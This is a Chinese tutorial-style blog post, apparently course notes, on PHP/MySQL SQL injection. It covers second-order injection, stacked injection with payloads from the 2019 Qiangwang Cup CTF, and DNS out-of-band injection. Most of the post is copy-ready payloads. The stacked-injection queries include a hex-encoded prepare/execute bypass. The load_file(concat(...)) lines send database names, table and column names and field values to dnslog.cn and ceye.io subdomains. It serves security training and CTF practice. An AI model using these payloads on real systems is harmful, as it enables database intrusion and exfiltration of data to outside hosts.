当前位置: 首页 > news >正文

SQL注入四-PHP应用SQL二次注入堆叠执行DNS带外功能点黑白盒条件

news 来源:原创 2024/9/21 22:07:59

演示案例:

  • PHP-MYSQL-二次注入-DEMO&74CMS
  • PHP-MYSQL-堆叠注入-DEMO&CTF强网
  • PHP-MYSQL-带外注入-DEMO&DNSLOG

#PHP-MYSQL-二次注入-DEMO&74CMS
1DEMO-用户注册登录修改密码
2CMS-74CMS个人中心简历功能
黑盒思路:分析功能有添加后对数据操作的地方(功能点)
白盒思路:insert后进入select或update的功能的代码块
注入条件:插入时有转义函数或配置,后续有利用插入的数据#PHP-MYSQL-堆叠注入-DEMO&CTF强网
堆叠注入触发的条件很苛刻,因为堆叠注入原理就是通过结束符同时执行多条sql语句,
例如php中的mysqli_multi_query函数。与之相对应的mysqli_query()只能执行一条SQL,所以要想目标存在堆叠注入,在目标主机存在类似于mysqli_multi_query()这样的函数,根据数据库类型决定是否支持多条语句执行.1、目标存在sql注入漏洞
2、目标未对";"号进行过滤
3、目标中间层查询数据库信息时可同时执行多条sql语句
支持堆叠数据库:MYSQL MSSQL Postgresql等-2019强网杯-随便注(CTF题型)
';show databases;
';show tables;
';show columns from `1919810931114514`;
';select flag from `1919810931114514`;
';SeT @a=0x73656c65637420666c61672066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;
1、目标存在sql注入漏洞
2、目标未对";"号进行过滤
3、目标中间层查询数据库信息时可同时执行多条sql语句#PHP-MYSQL-带外注入-DEMO&DNSLOG
0.注入条件
ROOT高权限且支持load_file()
有部分注入点是没有回显的,所有读取也是没回显的,采用带外
1.使用平台
http://ceye.io
http://www.dnslog.cn
2.带外应用场景:
解决不回显,反向连接,SQL注入,命令执行,SSRF等
SQL注入:
select load_file(concat('\\\\',(select database()),'.7logee.dnslog.cn\\aa'));
and (select load_file(concat('//',(select database()),'.69knl9.dnslog.cn/abc')))
// 查询当前数据库
id=1 and load_file(concat("\\\\",database(),".dbuh8a.ceye.io\\asdt"))//查询其他数据库
id=1 and load_file(concat("\\\\",(select schema_name from information_schema.schemata limit 0,1),".dbuh8a.ceye.io\\xxx.txt"))
"""
由于该DNS记录只能回显一个字段,所以因该使用limit,第一个参数是查询起始位置,第二个参数是查询个数
limit 0,1 查询第一个数据库名
limit 1,1 查询第二个数据库名
limit 2,1 查询第三个数据库名
"""//查询版本号
id=1 and load_file(concat("\\\\",version(),".dbuh8a.ceye.io\\xxx.txt"))//查询当前数据库demo01中第一个表名
id=1 and load_file(concat("\\\\",(select table_name from information_schema.tables where table_schema='demo01' limit 0,1 ),".dbuh8a.ceye.io\\xxx.txt"))"""
由于该DNS记录只能回显一个字段,所以因该使用limit,第一个参数是查询起始位置,第二个参数是查询个数
limit 0,1 查询第一个表名
limit 1,1 查询第二个表名
limit 2,1 查询第三个表名
"""
//查询security数据库emails表下第一个列名
id=1 and load_file(concat("\\\\",(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),".dbuh8a.ceye.io\\xxx.txt"))//查询字段值  数据库名为security 表名emails 列名id
id=1 and load_file(concat("\\\\",(select id from security.emails limit 0,1),".dbuh8a.ceye.io\\xxx.txt"))

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • 第 1 章 信息化和信息系统 -4
  • 栈内存和堆内存
  • HCIP-Datacom(H12-821)题库补充(3/26)
  • NTP服务搭建
  • 这回轮到鸿蒙禁用安卓了!!!
  • 【剑指offer】顺时针打印矩阵
  • 1.Git快速入门
  • 数据结构/C++:位图 布隆过滤器
  • 测试缺陷定位的基本方法
  • MATLAB下载+安装教程
  • 如何应对Android面试官->进程通信如何注册与获取服务
  • 逐步学习Go-并发通道chan(channel)
  • 【动态规划】【卡特兰数】Leetcode 96. 不同的二叉搜索树
  • python面试题(1~10)
  • conda删除虚拟环境
  • [PHP内核探索]PHP中的哈希表
  • [deviceone开发]-do_Webview的基本示例
  • “大数据应用场景”之隔壁老王(连载四)
  • 【附node操作实例】redis简明入门系列—字符串类型
  • 【译】理解JavaScript:new 关键字
  • Angular2开发踩坑系列-生产环境编译
  • es6(二):字符串的扩展
  • IOS评论框不贴底(ios12新bug)
  • isset在php5.6-和php7.0+的一些差异
  • Java 9 被无情抛弃,Java 8 直接升级到 Java 10!!
  • JavaScript 奇技淫巧
  • JDK 6和JDK 7中的substring()方法
  • Magento 1.x 中文订单打印乱码
  • Promise初体验
  • Travix是如何部署应用程序到Kubernetes上的
  • 阿里云容器服务区块链解决方案全新升级 支持Hyperledger Fabric v1.1
  • 实战|智能家居行业移动应用性能分析
  • 适配iPhoneX、iPhoneXs、iPhoneXs Max、iPhoneXr 屏幕尺寸及安全区域
  •  一套莫尔斯电报听写、翻译系统
  • Java总结 - String - 这篇请使劲喷我
  • ​人工智能书单(数学基础篇)
  • # 职场生活之道:善于团结
  • ###51单片机学习(2)-----如何通过C语言运用延时函数设计LED流水灯
  • $(document).ready(function(){}), $().ready(function(){})和$(function(){})三者区别
  • (70min)字节暑假实习二面(已挂)
  • (day18) leetcode 204.计数质数
  • (十七)Flink 容错机制
  • (四)搭建容器云管理平台笔记—安装ETCD(不使用证书)
  • (一)、python程序--模拟电脑鼠走迷宫
  • (转)JVM内存分配 -Xms128m -Xmx512m -XX:PermSize=128m -XX:MaxPermSize=512m
  • (转)从零实现3D图像引擎:(8)参数化直线与3D平面函数库
  • ***测试-HTTP方法
  • .net Application的目录
  • .net core webapi 大文件上传到wwwroot文件夹
  • .NET 设计一套高性能的弱事件机制
  • .NET处理HTTP请求
  • @JsonSerialize注解的使用
  • [.net] 如何在mail的加入正文显示图片
  • [《百万宝贝》观后]To be or not to be?
  • [2019.3.5]BZOJ1934 [Shoi2007]Vote 善意的投票